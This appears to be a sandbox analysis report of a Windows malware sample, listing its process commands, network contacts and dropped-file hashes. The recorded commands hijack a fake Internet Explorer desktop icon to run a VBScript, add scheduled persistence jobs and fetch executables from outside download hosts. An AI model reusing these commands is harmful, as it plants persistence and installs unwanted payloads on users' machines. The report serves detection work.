REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "wscript.exe c:\progra~1\Kingsoft\myfile\Microsoft\bot.vbs" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\fav\fav.cmd
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\runonce.cmd
C:\Windows\SysWOW64\sc.exe
sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
C:\Windows\SysWOW64\sc.exe
sc config Schedule start= auto
C:\Windows\SysWOW64\net.exe
net start "Task Scheduler"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start "Task Scheduler"
C:\Windows\SysWOW64\at.exe
at 8:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
C:\Windows\SysWOW64\at.exe
at 11:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
C:\Windows\SysWOW64\at.exe
at 14:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
C:\Windows\SysWOW64\at.exe
at 17:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
C:\Windows\SysWOW64\at.exe
at 21:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
C:\Windows\SysWOW64\at.exe
at 23:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\360.cmd
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\cpa.cmd
C:\Program Files\Kingsoft\myfile\soft\msn.exe
"C:\Program Files\Kingsoft\myfile\soft\msn.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe" "http://download.youbak.com/msn/software/partner/36a.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe" "http://soft.downxiazai.info/soft/YoudaoDict_zhusha_quantui_001.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe" "http://www.xunlei6x.com/msn/software/partner/1/chic7.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C del .\runonce.cmd
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.dao666.com | udp |
| HK | 154.220.60.25:80 | www.dao666.com | tcp |
| HK | 154.220.60.25:80 | www.dao666.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download.youbak.com | udp |
| US | 8.8.8.8:53 | 25.60.220.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| HK | 8.210.83.183:80 | download.youbak.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | soft.downxiazai.info | udp |
| US | 8.8.8.8:53 | 183.83.210.8.in-addr.arpa | udp |
| US | 76.223.54.146:80 | soft.downxiazai.info | tcp |
| US | 8.8.8.8:53 | www.xunlei6x.com | udp |
| US | 8.8.8.8:53 | 146.54.223.76.in-addr.arpa | udp |
| US | 172.82.182.50:80 | www.xunlei6x.com | tcp |
| US | 8.8.8.8:53 | 50.182.82.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.19.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
C:\Program Files\Kingsoft\myfile\file.vbs
| MD5 | 4a605601bb2c14b2856257b7b0c9f72b |
| SHA1 | e8a205693b77e7c4a35ce1539f2a3750a54a607a |
| SHA256 | 112e555e915ae44f2270a4c07417ce8e9a7b934bf780b4e534938fff6f47d17e |
| SHA512 | b1f6e26a7e41ff23e36b8297842daece7ce0f78abaf9bcf08679e516ff48af6132a9644a87b233d55881043201839c9e37cb8da02b3e7842ee506c0133dcf3cd |
C:\Program Files\Kingsoft\myfile\tool.cmd
| MD5 | 03471db7f2a2b9ed56d391fd1224474e |
| SHA1 | 4d3c3f719b56c4feb82a70bc97215d0a5534c817 |
| SHA256 | fe5e2851c481a0f479b2c6dc2bb6ebf267f10822f542b19d2dc71adbd67f5371 |
| SHA512 | 36c2e1ef0e0d062a22132e90083fe49fd8bad8f0f8443f651e70e3f87735f27edb1b3ed4a513e4c51ca1f9ae28205a12b0096aaa10220eb685bb2116819a0b0a |
C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs
| MD5 | 4741fe194f7332fcd29e7a83921c48d0 |
| SHA1 | 87648303da1f415c940753d03a61c0ad6066303d |
| SHA256 | 647afc0d0ea461025ed7c165ea012b2f9d703d23c21b45d9f67eb71375eb6e05 |
| SHA512 | 68653ce23e453995087f3d707df09ad147e2799181f9535d12e7c46b3bcd85baad281f235ab1f097d867b40f7babebf9bfc5659d9cb644ad050f80a266857f5e |
C:\Program Files\Kingsoft\myfile\open.vbs
| MD5 | 365359072c2d2b3593d9bb7d8ad2587e |
| SHA1 | ee6dc55034ad093e6ec5d81a3af97559cb68e2b6 |
| SHA256 | eb142788eed404ed50ea562da317e7abb9d0b25fcb5a8c51fec76643430e206d |
| SHA512 | f0f6ba5369cbf3aa5315256943e17135297ae937e8cb814a02bcc9d977d84608be843c28ed9067b9d9ed46d46bc07d03bf039495f5dcf2cb0012cd4f15e80544 |
C:\Program Files\Kingsoft\myfile\Internet Expl0rer.lnk
| MD5 | b26bdf8dd432f327015e14428a20790a |
| SHA1 | a5db52d58ad5911ee4d54576335c250ccf86083e |
| SHA256 | ff0f9b5b7634cadb7a4d58ccb1fa58c015217b6b890995c9ddc83156c9f8f43a |
| SHA512 | a532c5b0a22e1cb09beab9d1acbe2a972a02d3a7c7782207410fe40f2a38316155dfc8de63be971ec1d69432ecd9033c971a588d65c40a5abb69d3f4792ba8d4 |
C:\Program Files\Kingsoft\myfile\fav\fav.cmd
| MD5 | 49cb8d1c4ec9b7b4cba2dda2226cf9f9 |
| SHA1 | 28878d2840cd6bb8f345aeb185bc9b5acd19f62c |
| SHA256 | 80f6196a21dbafc669a8468ef3d0a16ded883365264e545237eefddd617d83a3 |
| SHA512 | d440104c7fb55b6e31cc73ebbeef11fc0ff14380156c1227085325923933210f6f687ee3e0daa1b47e0aed6e0a03e0c7263cdebc3a2e58261bb1f62e46bf229e |
C:\Program Files\Kingsoft\myfile\fav\tao.ico
| MD5 | 8320a22354a5419af035cdf42902ae93 |
| SHA1 | d9954707de08eaa6ecc7d13d69f76c51b316ebcc |
| SHA256 | 419408ac3e52f9b5878825dd3fc416a394ff5665208bbd36930ea52910be04bc |
| SHA512 | 592c4404292705321da9ec099ff60a22d396395acf31f900d4da661949a40c7966fcb20e7f8cadcd41c1dc729a290d68b21a74a352cb5b1b0a1b7b0ca1d5715b |
C:\Program Files\Kingsoft\myfile\runonce.cmd
| MD5 | a5adb190983aeba13ddd600df0f54c7c |
| SHA1 | 0f5727a77f726df6e2f54881a4ec14ea349d3c28 |
| SHA256 | 9de9d82ee19a26103e3d18960eee9f8c75b580d5bcfe86182eda70b9fe928b64 |
| SHA512 | 3485c554ed2a7531beaf6cdc4525b9740e2f83e1929848a79f6a1a927453f4dce816443f94d8c32b5f461b4a3e2048cf2268be2076ee907c4f5d2bb0cf913294 |
C:\Program Files\Kingsoft\myfile\360.cmd
| MD5 | af37ab2d97a8822d603054ba02e453b6 |
| SHA1 | a9c3892ab02681d98f6f6be0666ce2d99a6cb80e |
| SHA256 | 001a8ba40066c0820d2911c68edbdda46657f1ded63558ba0939760c7b699416 |
| SHA512 | 42e6af1d518cc2cccbb180e59dd77cb2c30463724977edca19de7fa43ae97b988f400e153e151686ca0119d42412dc8d8012d165826e6cefa975c3cfef91e883 |
C:\Program Files\Kingsoft\myfile\se.vbs
| MD5 | 811afc25970fe2402bb05093eb0974db |
| SHA1 | 85c8c5deaf21946519edbf6a73d095097a81c177 |
| SHA256 | 5ec36f1336cb7ba697cd36aeb24b5d86c6e4609f566c0a14c54f5e79b35c6360 |
| SHA512 | 9a2d8cccd9dd43d4dd4bf886c3983fd40cfec5c3484ab221ffbab52884a560476199c61cdc6722ed346a005faf95b4de8dce2a391f7c4db7ef7dee305446017a |
C:\Program Files\Kingsoft\myfile\se1.vbs
| MD5 | 694a79b632b956b7537bf78b4d6cd83a |
| SHA1 | ce04560daf58883ff32a01c355fc3db0c012449a |
| SHA256 | fee86f4d3a6cd91c94ee5c762b5a56b2fbb8fd880ad31f3ac08d63789d8b47bc |
| SHA512 | 353a79e00fe3a0fc4c664096b0fcf24230e9eefa3dbad21c53356f7b41d6c21d6f04293473025bc8c7bde130efc9e91ca002a12fa7debe41498a9fe99c8d9bce |
C:\Program Files\Kingsoft\myfile\cpa.cmd
| MD5 | 3b24f51190ca32436b8c5b0ef8b2da27 |
| SHA1 | e8011f11bfebef1f25aa95b0fd5945f74e8ad258 |
| SHA256 | be1a009d09aabbb90b79d754542d6216ed59ff0e75e7f6fe12def54f1e0fb0d9 |
| SHA512 | ee67c06f58767aef4045c568514f018c39e5c82498345fb969c9a02ac9280077cd9fa8312156d6c386d2705e187e4347d6018bd078690b360843f43a4f44b4f8 |
C:\Program Files\Kingsoft\myfile\soft\msn.exe
| MD5 | 700742d098ceb5760ecc5428af1d3665 |
| SHA1 | 9adb397704593a127a02b121229a3e39bc4e3ca5 |
| SHA256 | b7a12d2c10911badd73ab91884356d14a48824f216d11e441423b765bf59694d |
| SHA512 | 44031b16fe3027058a9fb8c3be749de94e7513c7d1ce43ce9966d37ee756d2e1c2645ba318c14a2eef5da744c8952a3304d811d77774bd98b5ade9211516c99f |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe
| MD5 | 0c18455508ca5d9ced9b8c51046af383 |
| SHA1 | da113b832bd2acb6190947d4e11f5a97a0be80a8 |
| SHA256 | fb254313e1f3aba11d554fe4725e72ed9b797b954fd42f4fb1abc60cfd8e51cf |
| SHA512 | 6f2962d45055c8a934788f61afeda407e5262ac52c05316533206dbbfb279e00d78e72f3148383265e29bf1f94782d1994ddd40602cc536ca4feed12d3d157e4 |
C:\Users\Admin\AppData\Roaming\JjlDownLoader\0CloudEx_onlinesetup.exe
| MD5 | e89f75f918dbdcee28604d4e09dd71d7 |
| SHA1 | f9d9055e9878723a12063b47d4a1a5f58c3eb1e9 |
| SHA256 | 6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023 |
| SHA512 | 8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0 |
C:\Users\Admin\AppData\Roaming\JjlDownLoader\0CloudEx_onlinesetup.exe
| MD5 | 1bc415b31cdff50d79ea2a3d7b4ff2c1 |
| SHA1 | f5ebab61deebc3d7a4a6676a23b982f1418ae6a6 |
| SHA256 | 582ea6421c80adc1de2dcb34fb8db1926e34b49219d99306693166a6b268d412 |
| SHA512 | ee9718e829fa7c6b2e3b208fe99acd390d704a4ad037fd9b5ae231db184f48146792fb1ac028a69224ddca2c3195ef2aa5353ee6bc7abe01157773f4a6e50e84 |
memory/4292-113-0x0000000000400000-0x0000000000423000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver269E.tmp
| MD5 | 1a545d0052b581fbb2ab4c52133846bc |
| SHA1 | 62f3266a9b9925cd6d98658b92adec673cbe3dd3 |
| SHA256 | 557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1 |
| SHA512 | bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\08ZTJJXR\suggestions[1].en-US
| MD5 | 5a34cb996293fde2cb7a4ac89587393a |
| SHA1 | 3c96c993500690d1a77873cd62bc639b3a10653f |
| SHA256 | c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad |
| SHA512 | e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee |